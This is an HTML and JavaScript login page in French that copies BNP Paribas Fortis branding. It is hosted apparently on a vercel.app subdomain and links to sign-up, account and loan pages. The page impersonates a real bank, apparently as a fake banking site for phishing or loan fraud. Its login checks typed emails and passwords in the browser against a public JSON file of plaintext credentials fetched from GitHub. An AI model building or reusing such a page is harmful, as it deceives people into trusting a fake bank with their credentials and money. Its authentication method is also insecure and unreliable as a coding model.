<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
 
 <meta name="viewport" content="width=device-width,height=device-height initial-scale=1">
 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <title></title>
  <style>
  @media only screen and (max-width: 360px) {
    
  
    
    body{
    position: relative;
 
    top
   margin :0px;
   padding: 0px;
  overflow-x: hidden;
      color:white;
  
    }
    .account{
 padding: 10px 0px;
    }
    .account h1{
     margin: 0px;
      text-align: center;
      color: seagreen;
    }
    .signup{
      overflow: hidden;
      margin: 0 auto;
width:320px;
   display: flex;
   flex-direction: column;
   align-items: center;
   justify-content: center;
  padding: 50px 0px;
    border-radius: 5px;
 box-shadow: 2px 2px 28px lightslategray;
    opacity: 0.9;
      
   
      overflow: hidden;
    }
.signup img{
 border-radius: 50%; 
height:80px;
  width: 80px;
}
    input{
  
     height:30px;
      width:280px;
      margin:5px auto;
      display: block;
     border: 2px solid lightgrey;
      border-radius: 2px;
      font-size: 18px;
    letter-spacing: 2px;
      outline: none;
     
    }
    
  .password ,.email{
    font-style: bold;
    text-shadow: 2px 2px 2px lightgrey;
    font-size: 20px;
    letter-spacing: 2px;
    margin: 20px auto;
    text-align: center;
    width:100%;
    color: seagreen;
  }
    .btn-sign{
   display:flex;
   justify-content: center;
   font-size: 18px;
   width:100%;
    }
    button{
      padding:5px 0px;
     width: 200px;
        background:white;
        color:seagreen ;
        outline: none;
        border:2px solid lightgrey;
        border-radius: 3px;
        font-size: 22px;
    }
    button:hover{
      outline: none;
      border: none;
      background: darkgreen;
      color: whitesmoke;
    }
    .info{
      color: red;
      text-align: center;
      
    
      width: 100%;
    }
  
 
 #isCompte{
   display: flex;
   flex-direction:column;
justify-content: center;
   align-items: center;
   position: absolute;
   color: black;
  padding: 20px 10px;
   letter-spacing: 3px;
   font-size: 18px;
   z-index: 200;
   top:-400px;
   left: 0px;
   background: whitesmoke;
  
 
   transition :top 3s ease;
 }
 footer {
 
 color: seagreen;
text-shadow: 2px 2px 3px ;
 
margin: 20px;
  letter-spacing: 2px;
  font-size: 20px;
  text-align: center;
  
}
nav{ 

  display: flex;
  justify-content: center;
  align-items: center;
   
   }
  .list-drl{
     position: absolute;
   left: 0px;
   right: 0px;
z-index: 999;
top: 80px;
margin: 30px 0px;
   padding: 20px 0px;
  
     display:none;
     background:whitesmoke;
     flex-direction: column;
   
     align-items:center;
     opacity: 0;
    transition: top opacity transform 5s ease;
  
     color: seagreen;
     
   }
.list-drl li{
  
  list-style: none;
 width: 363px;
 text-align: center;
  margin: 20px 0px;
  background: white;
  background: white;

}
.list-drl li a{
 
  text-decoration: none;
list-style: none;
display: block;
width:100%;
color: seagreen;
border-radius: 8px;
text-align: center;
font-size: 20px;
padding: 8px 0px;
}
.list-drl li a:hover{
  list-style: none;
  background: white;
  padding: 8px 0px;
  width:363px;
  border-radius: 4px;
  background: seagreen;
  color: whitesmoke;
}
   .imgbank h1 {
    color: seagreen;
    font-size: 20px;
    font-style: italic;
   
    text-shadow: 2px 2px 8px seashell;
   text-transform: uppercase;
   }
   .menu .menu-logo{

 

   
   
   }
   .menu-nav div{
   
 position: relative;
 top: 20px;
   width:50px;
   padding: 5px 20px;
     margin: 40px;
     font-size: 20px;
     color:white;
     text-decoration: none;
     border:1px solid whitesmoke;
   background: seagreen;
     border-radius: 4px;
   }
   .menu-nav{
  display: flex;
  align-items: center;
  justify-content: center;
m
     

 
    
   }
   
.menu-nav i{
  display: block;
}
  }
  </style>
</head>



<body>
  
  
  <div id="isCompte">
    <div>
      Vous n'aviez pas de compte chez BNP Paribas Fortis.
      <div style="margin: 10px 0px;">
        
    
     Êtes vous inscrit ? si oui veuillez patienter quelques minutes pour valider l'inscription demandée.
     </div>
     <div style="margin: 10px 0px;">
       
     
     Si non? inscrivez vous dès maintenant en cliquant sur le lien ci dessous 
     
       
     </div>
     <a href="https://bnpparibas-gfrz.vercel.app/signin">S'inscrire</a>
    </div>
  </div>

 
<div class="menu">
  <div class="list-drl">
       <div class="list-item">
         <li> <a href="https://bnpparibas-gfrz.vercel.app/  ">Accueil</a></li>
    
       </div>
       <div class="list-item">
         <li><a href="https://bnpparibas-gfrz.vercel.app/signup ">Se connecter</a></li>
       </div>
       <div class="list-item">
         <li><a href="https://bnpparibas-gfrz.vercel.app/signin">S'inscrire</a></li>
       </div>
    
    
    <div class="list-item">
         <li><a href="https://bnpparibas-gfrz.vercel.app/account">Account</a></li>
       </div>
    <div class="list-item">
   <li><a href="https://bnpparibas-gfrz.vercel.app/loan">Prêt</a></li>
   
     
       
     </div>
   
    </div>
     </div><div></div>
       
     </div>
     <nav>
       
     
  <div class="imgbank">
  <div id="google_translate_element">
  
  </div>
      <h1>BNP Paribas Fortis</h1>
       
        
  </div>

    
   
      <div class="menu-nav">
     
        
              <div href id="hover-list"><i style="font-size:24px;text-align: center" class="fa">&#xf0c9;</i>
              </div>
      </div>

    </nav>



  </div>


<div class="signup">
  <img src="https://raw.githubusercontent.com/lisbonne456/gitau/master/bnp-paribas (1).jpg" alt="">
  
  <div class="account">
 <h1>BNP Paribas Fortis</h1> 

    <div class="email">
      <div style="margin: 10px 0px;">
        Connectez-vous
      </div>
      Courrier Mail(@) <i class="fa fa-envelope" style="font-size:24px"></i></div>
      <div>
           <input id="mail" type="text"placeholder="r@gmail.com" value="" />
      </div>
   
       <div class="info">
    
       </div>
     <div class="password">
       Mot de Passe
 <i style="font-size:24px" class="fa">&#xf084;</i>
       
     </div>
     <div>
           <input id="passw" type="password" placeholder="secretpassword" value=""/>
     </div>

   <div class="info">
     
   </div>
 
</div>
 <div class="btn-sign">
         <button id=" btn"type="button" onclick="add()"  >
         Connectez-vous<i style="font-size:24px" class="fa">&#xf090;</i>
         </button>
     </div>
       
       </div> 
      
      </div>
        <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
          <script type="text/javascript">
            function googleTranslateElementInit() {
              new google.translate.TranslateElement({ pageLanguage: 'en-US' }, 'google_translate_element');
            }
            console.log(navigator.language)
          </script>
     <script type="text/javascript" charset="utf-8">
   
     var userConnectMail='',userConnectPassword=""
     const isCompte=document.getElementById("isCompte")
     
     const btn=document.getElementById('btn')
     const password = document.getElementById('passw')
     const mail = document.getElementById("mail")
     const info=document.getElementsByClassName('info')
     
     mail.addEventListener("focus",function(){
       isCompte.style.top='-400px'
     })
     password.addEventListener("focus", function() {
       isCompte.style.top = '-400px'
     })
   function add(){
    
     if(password.value!=''&& mail.value!=''){
       userConnectMail=userFindEmail(mail.value,contenu)
       userConnectPassword=userFindPassword(password.value,contenu)
       if(password.value.length>=8){
         
         info[1].innerHTML=""
       }
       else{
         info[1].innerHTML='Mot de passe doit avoir au minimum 8 caractères '
       }
     if(mail.value!=''){
    
       const index = mail.value.indexOf('@')
       if (index > -1) {
         info[0].innerHTML = ''
       }
       else {
         info[0].innerHTML = 'Email doit contenir  un symbole @'
       }
     }
     
     
     if(mail.value==userConnectMail.email& password.value==userConnectMail.password){
   
     const link=document.getElementById("link")
       
window.location.href=`https://bnpparibas-gfrz.vercel.app/account?authuser=${mail.value}`
createCookie('email',mail.value,1)
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
    
       
       
     }
     else{
       const index = mail.value.indexOf('@')
      if (password.value.length >= 8 && index > -1) {
      
      isCompte.style.top='80px'
      }
  
     }
     }
     else{
       if(mail.value==''){
     
         info[0].innerHTML=' EMail ne peut pas être vide'
       }
       if(password.value==''){
       
         info[1].textContent="Mot de passe ne peut pas être vide"
       }
       if(mail.value!=''){
       
          userConnectMail=userFindEmail(mail.value,contenu)
         const index=mail.value.indexOf('@')
         if(index>-1){
           info[0].innerHTML=''
         }
         else{
           info[0].innerHTML='Email doit avoir un arobase @'
         }
        
       }
       if(password.value!=''){
       userConnectPassword  =userFindPassword(password.value,contenu)
     if (password.value.length >= 8) {
     
       info[1].innerHTML = ""
     }
     else{
       info[1].textContent='Mot de passe doit avoir au minimum 8 caractères '
     }
         
       
         
       }
     }
   }
   
   
   function createCookie(name, value, days) {
     if (days) {
       var date = new Date();
       date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
       var expires = "; expires=" + date.toGMTString();
     }
     else var expires = "";
     document.cookie = name + "=" + value + expires + "; path=/";
   }
   var contenu=[]
   
  
  function userFetchInfo(user){
 return user
  }
  
function userFindEmail(mail,content){
 
 
 let index=content.findIndex((index)=>index.email==mail )
 if(index>-1){
   return content[index]
   
 }
 else{
   return {email:''
 }
  
 }
}
function userFindPassword(password,content){
  
  let index= content.findIndex((pass)=>pass.password==password)
  if(index>-1){
   return content[index]}
 else{
   return {password:''
 }
  
 }
 
}






function getCookie(name) {
  const cookies = document.cookie.split('; ')
  const value = cookies
    .find(c => c.startsWith(name + "="))
    ?.split('=')[1]
  if (value === undefined) {
    return null
  }
  return decodeURIComponent(value)
}

let sessionEmail=""
let bnpparislisbonne=""
window.onload=function(){
  fetch('https://raw.githubusercontent.com/lisbonne456/gitau/master/data.json').then(function(resp) {
    return resp.json()
  }).then(function(data) {
  
  
   contenu=(userFetchInfo(data))
  
  })
  
  if(sessionEmail!=null|| sessionEmail!=undefined && bnpparislisbonne!=null||bnpparislisbonne!=undefined){
   
  }
  
}

let listOpe=true,fetchData=[],formGetUser={},bicselect='',view='',user={email:""}
    const list= document.getElementById('hover-list')
    const app=document.getElementById('app')
    const listItem=document.getElementsByTagName('li')
    const listDeroulante=document.getElementsByClassName("list-drl")
    
    


/*============Variables setting======*/





  list.addEventListener('click',function() {
      if(listOpe){
        listDeroulante[0].style.top = '80px'
        listDeroulante[0].style.opacity = 1
        listDeroulante[0].style.display='flex'
        listOpe=false
      }
      else{
        listDeroulante[0].style.top = '65px'
        listDeroulante[0].style.opacity = 0
      listDeroulante[0].style.display='none'
        listOpe=true
      }
    
    })
   
   console.log(window.innerHeight)

     </script>
    <footer>
      All Right Reserved ©2024
    </footer>
</body>

</html>
